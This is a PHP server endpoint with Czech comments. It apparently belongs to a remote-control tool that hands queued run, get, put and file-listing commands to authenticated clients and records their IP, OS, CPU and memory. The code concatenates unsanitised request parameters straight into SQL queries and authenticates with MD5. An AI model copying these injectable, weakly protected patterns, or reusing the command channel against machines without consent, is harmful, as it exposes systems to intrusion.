<?php
  
  include("../inc/db.php");

  if( (!@$_GET['cas'])or(!@$_GET['log'])or(!@$_GET['hash']) )
  {
     die("------1\nneplatny dotaz!-----");
  };
    
  $HESLA=mysql_query("select ID, HESLO from hesla where LOGIN=\"". $_GET['log'] ."\"");
  $HESLA=mysql_fetch_assoc($HESLA);
  
  if($_GET['hash']==md5($_GET['log'] . $HESLA['HESLO'] . $_GET['cas']))
  {//autorizovany pristup
  
     $result=mysql_query("select PRIKAZ, DATUM from uloziste where ( (ID=". $HESLA['ID'] .")and(ODPOVED=\"\")and(DATUM>=".(time()-60).") )");
     //vypise PRIKAZ a KDY byl vyslan; ale jen pokud tento prikaz jiz nebyl splnen a neni u nej ODPOVED
     
     $result=mysql_fetch_assoc($result);
     
     $result_IP=mysql_query("select IP from uloziste where ( (ID=". $HESLA['ID'] .")and(DATUM>=".(time()-60).") )");
     $result_IP=mysql_fetch_assoc($result_IP);
     
     if(($result_IP['IP'])and($result_IP['IP']!=$_SERVER['REMOTE_ADDR']))
     {
        die("------1\nz teto IP nebyl prijat predchozi prikaz-----");
     };
     
     mysql_query("update uloziste set IP=\"". $_SERVER['REMOTE_ADDR'] ."\", JMENO=\"". gethostbyaddr($_SERVER['REMOTE_ADDR']) ."\", CAS=\"". @$_GET['cas'] ."\", LOCAL_IP=\"". @$_GET['local_ip'] ."\", LOCAL_JMENO=\"". @$_GET['local_jmeno'] ."\", OS=\"". @$_GET['os'] ."\", ROZLISENI=\"". @$_GET['rozliseni'] ."\", PAMET=\"". @$_GET['pamet'] ."\", CPU=\"". @$_GET['cpu'] ."\", DATUM=". time() ." where ID=". $HESLA['ID']);

     if(!@$result['PRIKAZ'])
     {
        die("-----0\nzadne nove prikazy-----");     
     };
?>
-----<?php echo "1\n" ?>
<?php echo Date("H:i:s d.m.y", $result['DATUM']). "\n"; ?>
<?php 
if( (strpos(trim($result['PRIKAZ']),"run")===0) or (strpos(trim($result['PRIKAZ']),"get")===0) or (strpos(trim($result['PRIKAZ']),"put")===0) or (strpos(trim($result['PRIKAZ']),"adresare")===0) or (strpos(trim($result['PRIKAZ']),"soubory")===0) )
{
  echo substr(trim($result['PRIKAZ']),0,strpos(trim($result['PRIKAZ'])," ")) . "\n" . substr(trim($result['PRIKAZ']),strpos(trim($result['PRIKAZ'])," ")+1);
  
  if(substr(trim($result['PRIKAZ']),0,3)=="put")
  {
     clearstatcache();//velikost souboru je cachovana a toto zajisti aktualni hodnotu  
     echo "\n" . (@filesize("../usr/" . $_GET['log'] . "/upload.upl")+0);
  };
  
}else{

  echo str_replace(" ", "\n", trim($result['PRIKAZ']));
  
}; ?>-----
<?php
     
  }else{//neautorizovany pristup
     die("------1\nneautorizovany dotaz!-----");
  };

?>
